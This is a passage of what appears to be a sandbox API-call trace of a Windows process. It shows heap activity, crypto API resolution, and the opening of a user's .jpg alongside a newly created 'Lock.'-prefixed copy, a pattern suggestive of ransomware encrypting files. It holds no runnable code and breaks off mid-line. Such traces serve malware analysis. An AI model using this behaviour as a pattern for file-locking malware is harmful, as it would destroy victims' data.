CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0206.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0206.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.280] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0206.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.280] CryptDestroyHash (hHash=0xaa5820) returned 1 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.283] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0206.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.287] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.288] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/qN0j1jGF7bK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qn0j1jgf7bk.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0206.288] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.289] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.qN0j1jGF7bK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.qn0j1jgf7bk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0206.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0206.290] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.290] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0206.291] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0206.292] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x7426, lpOverlapped=0x0) returned 1 [0206.293] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0206.294] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 